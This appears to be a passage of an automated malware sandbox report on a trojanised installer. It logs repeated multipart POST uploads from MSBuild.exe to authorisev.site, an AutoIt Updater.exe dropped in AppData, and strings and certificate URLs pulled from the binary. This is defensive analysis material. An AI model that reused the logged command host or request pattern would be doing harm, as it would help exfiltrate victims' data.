Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1Cookie: __cf_mw_byp=6dV0eNX_lBbnb2hOAl2v78FYI7Qpdk4E83U3y_mHFl4-1730454656-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8779Host: authorisev.site
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1Cookie: __cf_mw_byp=6dV0eNX_lBbnb2hOAl2v78FYI7Qpdk4E83U3y_mHFl4-1730454656-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20432Host: authorisev.site
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1Cookie: __cf_mw_byp=6dV0eNX_lBbnb2hOAl2v78FYI7Qpdk4E83U3y_mHFl4-1730454656-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1233Host: authorisev.site
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1Cookie: __cf_mw_byp=6dV0eNX_lBbnb2hOAl2v78FYI7Qpdk4E83U3y_mHFl4-1730454656-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 563570Host: authorisev.site
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=6dV0eNX_lBbnb2hOAl2v78FYI7Qpdk4E83U3y_mHFl4-1730454656-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 77Host: authorisev.site
Source: unknown TCP traffic detected without corresponding DNS query: 95.101.111.144
Source: unknown TCP traffic detected without corresponding DNS query: 95.101.111.137
Source: unknown TCP traffic detected without corresponding DNS query: 95.101.111.168
Source: unknown TCP traffic detected without corresponding DNS query: 95.101.111.144
Source: unknown TCP traffic detected without corresponding DNS query: 95.101.111.137
Source: unknown TCP traffic detected without corresponding DNS query: 95.101.111.168
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B9D935 InternetReadFile,SetEvent,GetLastError,SetEvent, 35_2_00B9D935
Source: global traffic DNS traffic detected: DNS query: authorisev.site
Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: authorisev.site
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 01 Nov 2024 09:50:56 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IjjQOQjUQOVK4cOVh2WZh0ToapHd4SyCVl2Tn8KkiQQ96CptCjAlAN7gf5OYvVe4t8qwZbXNwBrVj6rzo5QibK4DyKcXEonuXjIKHOINsGdQT9Ymj2SzkCECE%2F41MpMHtSg%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8dbafbc149e26c1c-DFW
Source: file.exe, is-EUGF2.tmp.3.dr, is-5MQFH.tmp.3.dr, is-E0D1D.tmp.3.dr String found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
Source: file.exe, is-EUGF2.tmp.3.dr, is-5MQFH.tmp.3.dr, is-E0D1D.tmp.3.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: file.exe, is-EUGF2.tmp.3.dr, is-5MQFH.tmp.3.dr, is-E0D1D.tmp.3.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: file.exe String found in binary or memory: http://ccsca2021.crl.certum.pl/ccsca2021.crl0s
Source: file.exe String found in binary or memory: http://ccsca2021.ocsp-certum.com05
Source: file.tmp, 00000001.00000003.1680291357.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.1.dr, _isdecmp.dll.3.dr String found in binary or memory: http://crl.certum.pl/cscasha2.crl0q
Source: file.tmp, 00000001.00000003.1680291357.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmp, file.exe, _isdecmp.dll.1.dr, _isdecmp.dll.3.dr String found in binary or memory: http://crl.certum.pl/ctnca.crl0k
Source: file.exe String found in binary or memory: http://crl.certum.pl/ctnca2.crl0l
Source: file.exe String found in binary or memory: http://crl.certum.pl/ctsca2021.crl0o
Source: file.exe, is-EUGF2.tmp.3.dr, is-5MQFH.tmp.3.dr, is-E0D1D.tmp.3.dr String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: file.exe, is-EUGF2.tmp.3.dr, is-5MQFH.tmp.3.dr, is-E0D1D.tmp.3.dr String found in binary or memory: http://crl.entrust.net/ts1ca.crl0
Source: is-7LJOT.tmp.3.dr String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: is-7LJOT.tmp.3.dr String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: is-7LJOT.tmp.3.dr String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: is-7LJOT.tmp.3.dr String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: file.tmp, 00000001.00000003.1680291357.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.1.dr, _isdecmp.dll.3.dr String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: file.exe, is-EUGF2.tmp.3.dr, is-5MQFH.tmp.3.dr, is-E0D1D.tmp.3.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: file.exe, is-EUGF2.tmp.3.dr, is-5MQFH.tmp.3.dr, is-E0D1D.tmp.3.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: file.exe, is-EUGF2.tmp.3.dr, is-5MQFH.tmp.3.dr, is-E0D1D.tmp.3.dr String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: file.tmp, 00000001.00000003.1680291357.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.1.dr, _isdecmp.dll.3.dr String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://cscasha2.ocsp-ce
Source: file.tmp, 00000001.00000003.1680291357.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.1.dr, _isdecmp.dll.3.dr String found in binary or memory: http://cscasha2.ocsp-certum.com04
Source: file.exe, is-EUGF2.tmp.3.dr, is-5MQFH.tmp.3.dr, is-E0D1D.tmp.3.dr String found in binary or memory: http://ocsp.digicert.com0
Source: file.exe, is-EUGF2.tmp.3.dr, is-5MQFH.tmp.3.dr, is-E0D1D.tmp.3.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: file.exe, is-EUGF2.tmp.3.dr, is-5MQFH.tmp.3.dr, is-E0D1D.tmp.3.dr String found in binary or memory: http://ocsp.entrust.net02
Source: file.exe, is-EUGF2.tmp.3.dr, is-5MQFH.tmp.3.dr, is-E0D1D.tmp.3.dr String found in binary or memory: http://ocsp.entrust.net03
Source: file.tmp, 00000001.00000003.1680291357.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.1.dr, _isdecmp.dll.3.dr String found in binary or memory: http://ocsp.sectigo.com0
Source: file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.us
Source: is-7LJOT.tmp.3.dr String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: is-7LJOT.tmp.3.dr String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: is-7LJOT.tmp.3.dr String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://repository.certum
Source: file.exe String found in binary or memory: http://repository.certum.pl/ccsca2021.cer0
Source: file.tmp, 00000001.00000003.1680291357.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.1.dr, _isdecmp.dll.3.dr String found in binary or memory: http://repository.certum.pl/cscasha2.cer0
Source: file.tmp, 00000001.00000003.1680291357.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmp, file.exe, _isdecmp.dll.1.dr, _isdecmp.dll.3.dr String found in binary or memory: http://repository.certum.pl/ctnca.cer09
Source: file.exe String found in binary or memory: http://repository.certum.pl/ctnca2.cer09
Source: file.exe String found in binary or memory: http://repository.certum.pl/ctsca2021.cer0A
Source: is-7LJOT.tmp.3.dr String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: is-7LJOT.tmp.3.dr String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: file.tmp, 00000001.00000003.1680291357.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmp, file.exe, _isdecmp.dll.1.dr, _isdecmp.dll.3.dr String found in binary or memory: http://subca.ocsp-certum.com01
Source: file.exe String found in binary or memory: http://subca.ocsp-certum.com02
Source: file.exe String found in binary or memory: http://subca.ocsp-certum.com05
Source: file.exe String found in binary or memory: http://vovsoft.com
Source: file.exe String found in binary or memory: http://vovsoft.com/
Source: file.exe String found in binary or memory: http://vovsoft.com/blog/how-to-activate-using-license-key/openU
Source: file.exe String found in binary or memory: http://vovsoft.com/blog/how-to-uninstall-vovsoft-software/openU
Source: file.exe String found in binary or memory: http://vovsoft.com/help/
Source: file.exe String found in binary or memory: http://vovsoft.com/openU
Source: file.exe String found in binary or memory: http://vovsoft.comopenS
Source: file.exe String found in binary or memory: http://vovsoft.comopenU
Source: Updater.exe, 0000001C.00000000.1715511029.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmp, Updater.exe, 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmp, is-7LJOT.tmp.3.dr String found in binary or memory: http://www.autoitscript.com/autoit3/X
Source: file.tmp, 00000001.00000003.1680291357.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmp, file.exe, _isdecmp.dll.1.dr, _isdecmp.dll.3.dr String found in binary or memory: http://www.certum.pl/CPS0
Source: file.exe, is-EUGF2.tmp.3.dr, is-5MQFH.tmp.3.dr, is-E0D1D.tmp.3.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: file.exe, is-EUGF2.tmp.3.dr, is-5MQFH.tmp.3.dr, is-E0D1D.tmp.3.dr String found in binary or memory: http://www.entrust.net/rpa03
Source: file.exe String found in binary or memory: http://www.indyproject.org/
Source: MSBuild.exe, 00000024.00000002.2348303261.0000000001271000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://authorisev.site/
Source: MSBuild.exe, 00000024.00000002.2348303261.00000000012F2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://authorisev.site//
Source: MSBuild.exe, 00000024.00000002.2348303261.00000000012DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://authorisev.site/0
Source: MSBuild.exe, 00000024.00000002.2348303261.0000000001271000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://authorisev.site/2U
Source: MSBuild.exe, 00000024.00000002.2348303261.00000000012CF000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000024.00000002.2348303261.0000000001271000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://authorisev.site/api
Source: MSBuild.exe, 00000024.00000002.2348303261.00000000012F2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://authorisev.site/mOW
Source: MSBuild.exe, 00000024.00000002.2348303261.0000000001271000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000024.00000002.2348303261.00000000012F2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://authorisev.site/pi
Source: MSBuild.exe, 00000024.00000002.2348303261.000000000124D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://authorisev.site:443/api
Source: file.tmp, 00000001.00000003.1680291357.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.1.dr, _isdecmp.dll.3.dr String found in binary or memory: https://jrsoftware.org/
Source: file.exe String found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: file.tmp, 00000001.00000003.1680291357.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.1.dr, _isdecmp.dll.3.dr String found in binary or memory: https://jrsoftware.org0
Source: file.tmp, 00000001.00000003.1680291357.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.1.dr, _isdecmp.dll.3.dr String found in binary or memory: https://sectigo.com/CPS0D
Source: file.exe String found in binary or memory: https://vovsoft.com/blog/credits-and-acknowledgements/open
Source: file.exe String found in binary or memory: https://vovsoft.com/translation/
Source: file.exe String found in binary or memory: https://vovsoft.com/translation/openU
Source: is-7LJOT.tmp.3.dr String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: file.tmp, 00000001.00000003.1680291357.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmp, file.exe, _isdecmp.dll.1.dr, _isdecmp.dll.3.dr String found in binary or memory: https://www.certum.pl/CPS0
Source: file.exe, is-EUGF2.tmp.3.dr, is-5MQFH.tmp.3.dr, is-E0D1D.tmp.3.dr String found in binary or memory: https://www.entrust.net/rpa0
Source: is-7LJOT.tmp.3.dr String found in binary or memory: https://www.globalsign.com/repository/0
Source: is-7LJOT.tmp.3.dr String found in binary or memory: https://www.globalsign.com/repository/06
Source: file.exe, 00000000.00000003.1677553862.000000007F86B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.1676905528.0000000003260000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000000.1678965208.0000000000E91000.00000020.00000001.01000000.00000004.sdmp, file.tmp, 00000003.00000000.1685727842.000000000029D000.00000020.00000001.01000000.00000009.sdmp, file.tmp.0.dr, file.tmp.2.dr String found in binary or memory: https://www.innosetup.com/
Source: file.exe, 00000000.00000003.1677553862.000000007F86B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.1676905528.0000000003260000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000000.1678965208.0000000000E91000.00000020.00000001.01000000.00000004.sdmp, file.tmp, 00000003.00000000.1685727842.000000000029D000.00000020.00000001.01000000.00000009.sdmp, file.tmp.0.dr, file.tmp.2.dr String found in binary or memory: https://www.remobjects.com/ps
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49751
